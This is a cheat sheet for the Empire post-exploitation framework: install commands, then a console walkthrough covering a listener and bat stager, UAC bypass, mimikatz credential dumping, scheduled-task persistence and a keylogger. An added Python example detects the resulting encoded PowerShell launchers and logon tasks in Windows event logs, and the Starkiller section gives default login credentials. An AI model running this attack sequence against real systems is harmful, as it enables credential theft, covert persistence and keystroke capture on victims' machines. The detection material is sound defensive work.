Empire is a post-exploitation framework for Windows and macOS targets, operated from a Linux machine; Starkiller is a graphical frontend for Empire.
Empire
Install (pick one):
sudo apt install powershell-empire
sudo powershell-empire
OR
git clone "https://github.com/EmpireProject/Empire.git"
sudo ./Empire/setup/install.sh
OR
docker pull bcsecurity/empire
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire
Usage:
- help
- listeners
- uselistener [tab]
- uselistener http
- info
- set Name WebServer
- execute
- usestager windows/launcher_bat
- info
- options
- set Listener WebServer
- set StagerRetries 3
- execute
- back
- back
- list
- agents
- rename AAAAAAAA WIN1
- interact WIN1
- help
- info
- sysinfo
- bypassuac WebServer
- exit
- rename BBBBBBBB WIN1ADMIN
- interact WIN1ADMIN
- info
- mimikatz
- creds
- searchmodule NAME
- usemodule [tab]
- usemodule persistence/elevated/schtasks
- info
- set OnLogon True
- set Listener WebServer
- execute
- back
- usemodule collection/keylogger
- execute
- back
- back
- exit
# see ~/Empire/downloads/WIN1ADMIN/keystrokes.txt
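The steps above leave host artifacts a defender can look for: the `windows/launcher_bat` stager starts a hidden, encoded PowerShell launcher, and `persistence/elevated/schtasks` with `OnLogon True` registers a scheduled task that re-runs it at logon. The following Python is an added example, not part of this page or of the Empire project. It runs two detection rules over constructed Windows event records (4688 process creation, 4698 scheduled task created) and decodes the `-enc` argument so an analyst can see the script text. The event field names, the sample records, and the launcher flags `-noP -sta -w 1 -enc` that the rules key on are assumptions made for this example.

```python
import base64
import re
from dataclasses import dataclass

# Constructed stand-in for the stage-1 script a launcher would carry (not a real payload).
# PowerShell's -enc argument is base64 of the UTF-16LE encoded script text.
PAYLOAD_TEXT = "Write-Host 'constructed placeholder for the stager payload'"
PAYLOAD_B64 = base64.b64encode(PAYLOAD_TEXT.encode("utf-16-le")).decode("ascii")

# Constructed event records in the shape a SIEM might normalise them to (field names assumed).
SAMPLE_EVENTS = [
    {"event_id": 4688, "parent": r"C:\Windows\explorer.exe",
     "command_line": r'cmd.exe /c "C:\Users\alice\Downloads\launcher.bat"'},
    {"event_id": 4688, "parent": r"C:\Windows\System32\cmd.exe",
     "command_line": f"powershell -noP -sta -w 1 -enc {PAYLOAD_B64}"},
    {"event_id": 4698, "task_name": r"\Updater", "task_trigger": "logon",
     "task_command": "powershell", "task_arguments": f"-noP -sta -w 1 -enc {PAYLOAD_B64}"},
    {"event_id": 4698, "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "task_trigger": "weekly",
     "task_command": r"%windir%\system32\defrag.exe", "task_arguments": "-c -h -o -$"},
    {"event_id": 4688, "parent": r"C:\Windows\explorer.exe",
     "command_line": "powershell -NoProfile -Command Get-Process"},  # ordinary admin use, must not fire
]

# An encoded command (-enc / -encodedcommand / -e) followed by a base64 blob of plausible length.
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?.*?-(?:enc(?:odedcommand)?|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
# A hidden window request: -w 1 or -WindowStyle Hidden.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)


@dataclass
class Finding:
    event_id: int
    rule: str
    subject: str   # parent process for 4688, task name for 4698
    decoded: str   # script text recovered from the -enc argument


def decode_ps_payload(b64: str) -> str:
    """Return the script text behind a -enc argument, or '' if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def encoded_hidden_launcher(cmd: str):
    """Return the base64 blob if cmd is a PowerShell launcher that is both encoded and window-hidden."""
    m = ENCODED_PS.search(cmd)
    if m and HIDDEN_WINDOW.search(cmd):
        return m.group(1)
    return None


def check_process(ev):
    """4688: flag hidden, encoded PowerShell launchers (what the .bat stager spawns)."""
    blob = encoded_hidden_launcher(ev.get("command_line", ""))
    if blob is None:
        return None
    return Finding(4688, "hidden-encoded-powershell", ev.get("parent", ""), decode_ps_payload(blob))


def check_scheduled_task(ev):
    """4698: flag logon-triggered tasks whose action is such a launcher (schtasks persistence)."""
    if ev.get("task_trigger", "").lower() != "logon":
        return None
    action = f"{ev.get('task_command', '')} {ev.get('task_arguments', '')}"
    blob = encoded_hidden_launcher(action)
    if blob is None:
        return None
    return Finding(4698, "logon-task-encoded-powershell", ev.get("task_name", ""), decode_ps_payload(blob))


CHECKS = {4688: check_process, 4698: check_scheduled_task}


def scan(events):
    """Run the check matching each record's event id; return the list of findings."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev.get("event_id"))
        finding = check(ev) if check else None
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.rule}: {f.subject} -> {f.decoded}")
```

Both rules require the hidden-window flag in addition to the encoded command, so a plain `-NoProfile -Command` invocation by an administrator does not fire; the decoded text is kept on the finding because the base64 blob is what an analyst would otherwise have to decode by hand.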
Starkiller
apt install starkiller
sudo starkiller &
URL: the Empire host on port 1337 (the API port mapped in the docker command above)
Default username: empireadmin
Default password: password123